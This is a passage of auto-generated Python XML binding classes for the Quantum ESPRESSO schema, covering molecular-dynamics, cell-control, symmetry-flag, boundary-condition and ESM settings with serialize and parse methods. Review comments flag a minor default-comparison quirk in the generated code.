    def get_deltaT(self): return self.deltaT
    def set_deltaT(self, deltaT): self.deltaT = deltaT
    def get_nraise(self): return self.nraise
    def set_nraise(self, nraise): self.nraise = nraise
    def hasContent_(self):
        """Return True when any child element differs from its default.

        NOTE(review): timestep is compared against its default (20.0) here,
        but exportChildren tests `is not None`; an object whose only set
        field is timestep == 20.0 therefore serializes as a self-closing
        tag.  Kept as generated.
        """
        if (
            self.pot_extrapolation is not None or
            self.wfc_extrapolation is not None or
            self.ion_temperature is not None or
            self.timestep != 20.0 or
            self.tempw is not None or
            self.tolp is not None or
            self.deltaT is not None or
            self.nraise is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='mdType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (and its children) as XML to *outfile* at
        indentation *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('mdType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was parsed from, if any.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='mdType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='mdType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='mdType'):
        """No XML attributes are defined for this type."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='mdType', fromsubclass_=False, pretty_print=True):
        """Serialize the child elements in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.pot_extrapolation is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:pot_extrapolation>%s</qes:pot_extrapolation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pot_extrapolation), input_name='pot_extrapolation')), eol_))
        if self.wfc_extrapolation is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:wfc_extrapolation>%s</qes:wfc_extrapolation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.wfc_extrapolation), input_name='wfc_extrapolation')), eol_))
        if self.ion_temperature is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ion_temperature>%s</qes:ion_temperature>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ion_temperature), input_name='ion_temperature')), eol_))
        if self.timestep is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:timestep>%s</qes:timestep>%s' % (self.gds_format_double(self.timestep, input_name='timestep'), eol_))
        if self.tempw is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tempw>%s</qes:tempw>%s' % (self.gds_format_double(self.tempw, input_name='tempw'), eol_))
        if self.tolp is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:tolp>%s</qes:tolp>%s' % (self.gds_format_double(self.tolp, input_name='tolp'), eol_))
        if self.deltaT is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:deltaT>%s</qes:deltaT>%s' % (self.gds_format_double(self.deltaT, input_name='deltaT'), eol_))
        if self.nraise is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nraise>%s</qes:nraise>%s' % (self.gds_format_integer(self.nraise, input_name='nraise'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """No XML attributes are defined for this type."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* and store it on self."""
        if nodeName_ == 'pot_extrapolation':
            pot_extrapolation_ = child_.text
            pot_extrapolation_ = self.gds_validate_string(pot_extrapolation_, node, 'pot_extrapolation')
            self.pot_extrapolation = pot_extrapolation_
        elif nodeName_ == 'wfc_extrapolation':
            wfc_extrapolation_ = child_.text
            wfc_extrapolation_ = self.gds_validate_string(wfc_extrapolation_, node, 'wfc_extrapolation')
            self.wfc_extrapolation = wfc_extrapolation_
        elif nodeName_ == 'ion_temperature':
            ion_temperature_ = child_.text
            ion_temperature_ = self.gds_validate_string(ion_temperature_, node, 'ion_temperature')
            self.ion_temperature = ion_temperature_
        elif nodeName_ == 'timestep' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'timestep')
            self.timestep = fval_
        elif nodeName_ == 'tempw' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'tempw')
            self.tempw = fval_
        elif nodeName_ == 'tolp' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'tolp')
            self.tolp = fval_
        elif nodeName_ == 'deltaT' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'deltaT')
            self.deltaT = fval_
        elif nodeName_ == 'nraise' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            # Schema constrains nraise to xs:positiveInteger.
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'nraise')
            self.nraise = ival_
# end class mdType
class cell_controlType(GeneratedsSuper):
    """Generated binding for the qes ``cell_controlType`` complex type.

    Holds variable-cell dynamics settings (``cell_dynamics``, ``pressure``,
    ``wmass``, ``cell_factor``, the ``fix_*`` flags, ``isotropic`` and the
    ``free_cell`` integer matrix) and serializes them to / builds them from
    XML. Auto-generated (generateDS-style); edit with care — regeneration
    from the schema will overwrite manual changes.
    """
    subclass = None
    superclass = None
    def __init__(self, cell_dynamics=None, pressure=0.0, wmass=None, cell_factor=None, fix_volume=None, fix_area=None, fix_xy=None, isotropic=None, free_cell=None):
        self.original_tagname_ = None
        self.cell_dynamics = cell_dynamics
        self.pressure = pressure
        self.wmass = wmass
        self.cell_factor = cell_factor
        self.fix_volume = fix_volume
        self.fix_area = fix_area
        self.fix_xy = fix_xy
        self.isotropic = isotropic
        self.free_cell = free_cell
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, cell_controlType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if cell_controlType.subclass:
            return cell_controlType.subclass(*args_, **kwargs_)
        else:
            return cell_controlType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_cell_dynamics(self): return self.cell_dynamics
    def set_cell_dynamics(self, cell_dynamics): self.cell_dynamics = cell_dynamics
    def get_pressure(self): return self.pressure
    def set_pressure(self, pressure): self.pressure = pressure
    def get_wmass(self): return self.wmass
    def set_wmass(self, wmass): self.wmass = wmass
    def get_cell_factor(self): return self.cell_factor
    def set_cell_factor(self, cell_factor): self.cell_factor = cell_factor
    def get_fix_volume(self): return self.fix_volume
    def set_fix_volume(self, fix_volume): self.fix_volume = fix_volume
    def get_fix_area(self): return self.fix_area
    def set_fix_area(self, fix_area): self.fix_area = fix_area
    def get_fix_xy(self): return self.fix_xy
    def set_fix_xy(self, fix_xy): self.fix_xy = fix_xy
    def get_isotropic(self): return self.isotropic
    def set_isotropic(self, isotropic): self.isotropic = isotropic
    def get_free_cell(self): return self.free_cell
    def set_free_cell(self, free_cell): self.free_cell = free_cell
    def hasContent_(self):
        # True when at least one child element would be exported.
        # NOTE(review): `pressure` is compared to its default 0.0 here, while
        # exportChildren emits it whenever it is `not None` — an instance with
        # pressure exactly 0.0 and no other fields set serializes as an empty
        # element. Looks like a generator quirk; confirm before relying on it.
        if (
            self.cell_dynamics is not None or
            self.pressure != 0.0 or
            self.wmass is not None or
            self.cell_factor is not None or
            self.fix_volume is not None or
            self.fix_area is not None or
            self.fix_xy is not None or
            self.isotropic is not None or
            self.free_cell is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='cell_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('cell_controlType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='cell_controlType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='cell_controlType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='cell_controlType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='cell_controlType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child element in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.cell_dynamics is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:cell_dynamics>%s</qes:cell_dynamics>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.cell_dynamics), input_name='cell_dynamics')), eol_))
        if self.pressure is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:pressure>%s</qes:pressure>%s' % (self.gds_format_double(self.pressure, input_name='pressure'), eol_))
        if self.wmass is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:wmass>%s</qes:wmass>%s' % (self.gds_format_double(self.wmass, input_name='wmass'), eol_))
        if self.cell_factor is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:cell_factor>%s</qes:cell_factor>%s' % (self.gds_format_double(self.cell_factor, input_name='cell_factor'), eol_))
        if self.fix_volume is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fix_volume>%s</qes:fix_volume>%s' % (self.gds_format_boolean(self.fix_volume, input_name='fix_volume'), eol_))
        if self.fix_area is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fix_area>%s</qes:fix_area>%s' % (self.gds_format_boolean(self.fix_area, input_name='fix_area'), eol_))
        if self.fix_xy is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fix_xy>%s</qes:fix_xy>%s' % (self.gds_format_boolean(self.fix_xy, input_name='fix_xy'), eol_))
        if self.isotropic is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:isotropic>%s</qes:isotropic>%s' % (self.gds_format_boolean(self.isotropic, input_name='isotropic'), eol_))
        if self.free_cell is not None:
            # free_cell is a nested complex type; delegate to its exporter.
            self.free_cell.export(outfile, level, namespaceprefix_, name_='free_cell', pretty_print=pretty_print)
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self so
        # callers can chain `obj = cls.factory().build(node)`.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name, converting text to the typed value
        # (string / double / boolean / nested integerMatrixType).
        if nodeName_ == 'cell_dynamics':
            cell_dynamics_ = child_.text
            cell_dynamics_ = self.gds_validate_string(cell_dynamics_, node, 'cell_dynamics')
            self.cell_dynamics = cell_dynamics_
        elif nodeName_ == 'pressure' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'pressure')
            self.pressure = fval_
        elif nodeName_ == 'wmass' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'wmass')
            self.wmass = fval_
        elif nodeName_ == 'cell_factor' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'cell_factor')
            self.cell_factor = fval_
        elif nodeName_ == 'fix_volume':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'fix_volume')
            self.fix_volume = ival_
        elif nodeName_ == 'fix_area':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'fix_area')
            self.fix_area = ival_
        elif nodeName_ == 'fix_xy':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'fix_xy')
            self.fix_xy = ival_
        elif nodeName_ == 'isotropic':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'isotropic')
            self.isotropic = ival_
        elif nodeName_ == 'free_cell':
            obj_ = integerMatrixType.factory()
            obj_.build(child_)
            self.free_cell = obj_
            obj_.original_tagname_ = 'free_cell'
# end class cell_controlType
class symmetry_flagsType(GeneratedsSuper):
    """Generated binding for the qes ``symmetry_flagsType`` complex type.

    A bag of six optional boolean symmetry switches (``nosym``,
    ``nosym_evc``, ``noinv``, ``no_t_rev``, ``force_symmorphic``,
    ``use_all_frac``) with XML export/build support. Auto-generated
    (generateDS-style); regeneration overwrites manual edits.
    """
    subclass = None
    superclass = None
    def __init__(self, nosym=None, nosym_evc=None, noinv=None, no_t_rev=None, force_symmorphic=None, use_all_frac=None):
        self.original_tagname_ = None
        self.nosym = nosym
        self.nosym_evc = nosym_evc
        self.noinv = noinv
        self.no_t_rev = no_t_rev
        self.force_symmorphic = force_symmorphic
        self.use_all_frac = use_all_frac
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, symmetry_flagsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if symmetry_flagsType.subclass:
            return symmetry_flagsType.subclass(*args_, **kwargs_)
        else:
            return symmetry_flagsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_nosym(self): return self.nosym
    def set_nosym(self, nosym): self.nosym = nosym
    def get_nosym_evc(self): return self.nosym_evc
    def set_nosym_evc(self, nosym_evc): self.nosym_evc = nosym_evc
    def get_noinv(self): return self.noinv
    def set_noinv(self, noinv): self.noinv = noinv
    def get_no_t_rev(self): return self.no_t_rev
    def set_no_t_rev(self, no_t_rev): self.no_t_rev = no_t_rev
    def get_force_symmorphic(self): return self.force_symmorphic
    def set_force_symmorphic(self, force_symmorphic): self.force_symmorphic = force_symmorphic
    def get_use_all_frac(self): return self.use_all_frac
    def set_use_all_frac(self, use_all_frac): self.use_all_frac = use_all_frac
    def hasContent_(self):
        # True when at least one child element would be exported.
        if (
            self.nosym is not None or
            self.nosym_evc is not None or
            self.noinv is not None or
            self.no_t_rev is not None or
            self.force_symmorphic is not None or
            self.use_all_frac is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='symmetry_flagsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('symmetry_flagsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='symmetry_flagsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='symmetry_flagsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='symmetry_flagsType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='symmetry_flagsType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None boolean flag in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.nosym is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nosym>%s</qes:nosym>%s' % (self.gds_format_boolean(self.nosym, input_name='nosym'), eol_))
        if self.nosym_evc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nosym_evc>%s</qes:nosym_evc>%s' % (self.gds_format_boolean(self.nosym_evc, input_name='nosym_evc'), eol_))
        if self.noinv is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:noinv>%s</qes:noinv>%s' % (self.gds_format_boolean(self.noinv, input_name='noinv'), eol_))
        if self.no_t_rev is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:no_t_rev>%s</qes:no_t_rev>%s' % (self.gds_format_boolean(self.no_t_rev, input_name='no_t_rev'), eol_))
        if self.force_symmorphic is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:force_symmorphic>%s</qes:force_symmorphic>%s' % (self.gds_format_boolean(self.force_symmorphic, input_name='force_symmorphic'), eol_))
        if self.use_all_frac is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:use_all_frac>%s</qes:use_all_frac>%s' % (self.gds_format_boolean(self.use_all_frac, input_name='use_all_frac'), eol_))
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name; each child is parsed as an xsd
        # boolean accepting only the literals 'true'/'1'/'false'/'0'.
        if nodeName_ == 'nosym':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'nosym')
            self.nosym = ival_
        elif nodeName_ == 'nosym_evc':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'nosym_evc')
            self.nosym_evc = ival_
        elif nodeName_ == 'noinv':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'noinv')
            self.noinv = ival_
        elif nodeName_ == 'no_t_rev':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'no_t_rev')
            self.no_t_rev = ival_
        elif nodeName_ == 'force_symmorphic':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'force_symmorphic')
            self.force_symmorphic = ival_
        elif nodeName_ == 'use_all_frac':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'use_all_frac')
            self.use_all_frac = ival_
# end class symmetry_flagsType
class boundary_conditionsType(GeneratedsSuper):
    """Generated binding for the qes ``boundary_conditionsType`` complex type.

    Carries boundary-condition settings: ``assume_isolated`` (string),
    a nested ``esm`` element (esmType), ``fcp_opt`` (boolean) and
    ``fcp_mu`` (double), with XML export/build support. Auto-generated
    (generateDS-style); regeneration overwrites manual edits.
    """
    subclass = None
    superclass = None
    def __init__(self, assume_isolated=None, esm=None, fcp_opt=None, fcp_mu=None):
        self.original_tagname_ = None
        self.assume_isolated = assume_isolated
        self.esm = esm
        self.fcp_opt = fcp_opt
        self.fcp_mu = fcp_mu
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, boundary_conditionsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if boundary_conditionsType.subclass:
            return boundary_conditionsType.subclass(*args_, **kwargs_)
        else:
            return boundary_conditionsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_assume_isolated(self): return self.assume_isolated
    def set_assume_isolated(self, assume_isolated): self.assume_isolated = assume_isolated
    def get_esm(self): return self.esm
    def set_esm(self, esm): self.esm = esm
    def get_fcp_opt(self): return self.fcp_opt
    def set_fcp_opt(self, fcp_opt): self.fcp_opt = fcp_opt
    def get_fcp_mu(self): return self.fcp_mu
    def set_fcp_mu(self, fcp_mu): self.fcp_mu = fcp_mu
    def hasContent_(self):
        # True when at least one child element would be exported.
        if (
            self.assume_isolated is not None or
            self.esm is not None or
            self.fcp_opt is not None or
            self.fcp_mu is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='boundary_conditionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('boundary_conditionsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='boundary_conditionsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='boundary_conditionsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='boundary_conditionsType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='boundary_conditionsType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child element in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.assume_isolated is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:assume_isolated>%s</qes:assume_isolated>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.assume_isolated), input_name='assume_isolated')), eol_))
        if self.esm is not None:
            # esm is a nested complex type; delegate to its exporter.
            self.esm.export(outfile, level, namespaceprefix_, name_='esm', pretty_print=pretty_print)
        if self.fcp_opt is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fcp_opt>%s</qes:fcp_opt>%s' % (self.gds_format_boolean(self.fcp_opt, input_name='fcp_opt'), eol_))
        if self.fcp_mu is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fcp_mu>%s</qes:fcp_mu>%s' % (self.gds_format_double(self.fcp_mu, input_name='fcp_mu'), eol_))
    def build(self, node):
        # Populate this instance from an ElementTree node; returns self.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # This type declares no XML attributes.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Dispatch on the child tag name, converting text to the typed value
        # (string / nested esmType / boolean / double).
        if nodeName_ == 'assume_isolated':
            assume_isolated_ = child_.text
            assume_isolated_ = self.gds_validate_string(assume_isolated_, node, 'assume_isolated')
            self.assume_isolated = assume_isolated_
        elif nodeName_ == 'esm':
            obj_ = esmType.factory()
            obj_.build(child_)
            self.esm = obj_
            obj_.original_tagname_ = 'esm'
        elif nodeName_ == 'fcp_opt':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'fcp_opt')
            self.fcp_opt = ival_
        elif nodeName_ == 'fcp_mu' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'fcp_mu')
            self.fcp_mu = fval_
# end class boundary_conditionsType
class esmType(GeneratedsSuper):
    """Generated binding for the qes ``esmType`` complex type.

    Effective-screening-medium settings: ``bc`` (string), ``nfit``
    (positive integer), ``w`` and ``efield`` (doubles), with XML
    export/build support. Auto-generated (generateDS-style);
    regeneration overwrites manual edits.
    """
    subclass = None
    superclass = None
    def __init__(self, bc=None, nfit=None, w=None, efield=None):
        self.original_tagname_ = None
        self.bc = bc
        self.nfit = nfit
        self.w = w
        self.efield = efield
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered in CurrentSubclassModule_, then the
        # class-level `subclass` override, and finally this class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, esmType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if esmType.subclass:
            return esmType.subclass(*args_, **kwargs_)
        else:
            return esmType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_bc(self): return self.bc
    def set_bc(self, bc): self.bc = bc
    def get_nfit(self): return self.nfit
    def set_nfit(self, nfit): self.nfit = nfit
    def get_w(self): return self.w
    def set_w(self, w): self.w = w
    def get_efield(self): return self.efield
    def set_efield(self, efield): self.efield = efield
    def hasContent_(self):
        # True when at least one child element would be exported.
        if (
            self.bc is not None or
            self.nfit is not None or
            self.w is not None or
            self.efield is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='esmType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        # Write this element (and its children) to `outfile` at the given
        # indentation level, honoring any externally imported namespace defs.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('esmType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='esmType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
